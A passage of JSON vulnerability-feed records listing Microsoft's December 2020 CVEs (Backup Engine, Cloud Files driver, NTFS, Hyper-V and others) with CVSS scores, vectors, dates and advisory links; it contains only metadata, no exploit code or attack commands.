CVE-2020-16961, CVE-2020-16963, CVE-2020-16964. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Backup Engine Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-16962", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16962", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:48", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Backup Engine Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-16959", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16959", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:48", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Backup Engine Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-16958", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16958", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:46", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Backup Engine Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-16964", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16964", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:54", "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17103, CVE-2020-17136. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17134", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17134", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:50:55", "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17134, CVE-2020-17136. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17103", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17103", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T17:50:53", "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17103, CVE-2020-17134. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17136", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17136", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T17:50:53", "description": "Windows Error Reporting Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-17094. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Error Reporting Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17094", "CVE-2020-17138"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17138", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17138", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-17T17:50:56", "description": "Windows Error Reporting Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-17138. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Error Reporting Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17094", "CVE-2020-17138"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17094", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17094", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:24:17", "description": "DirectX Graphics Kernel Elevation of Privilege Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "DirectX Graphics Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17137"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17137", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17137", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:24:20", "description": "Windows Lock Screen Security Feature Bypass Vulnerability \n", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Lock Screen Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17099"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17099", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17099", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:24:16", "description": "Windows Overlay Filter Security Feature Bypass Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Overlay Filter Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17139"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17139", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17139", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:24:01", "description": "Windows SMB Information Disclosure Vulnerability \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows SMB Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17140"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17140", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17140", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:24:07", "description": "Kerberos Security Feature Bypass Vulnerability \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Kerberos Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16996"], "modified": "2021-03-12T08:00:00", "id": "MS:CVE-2020-16996", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16996", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-12-06T18:24:21", "description": "Windows Digital Media Receiver Elevation of Privilege Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Digital Media Receiver Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17097"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17097", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17097", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-06T18:24:23", "description": "Windows Network Connections Service Elevation of Privilege Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows Network Connections Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17092"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17092", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17092", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:24:21", "description": "Windows NTFS Remote Code Execution Vulnerability \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows NTFS Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17096"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17096", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17096", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:24:21", "description": "Windows GDI+ Information Disclosure Vulnerability \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Windows GDI+ Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17098"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17098", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17098", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:24:22", "description": "Hyper-V Remote Code Execution Vulnerability \n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-12-08T08:00:00", "type": "mscve", "title": "Hyper-V Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": 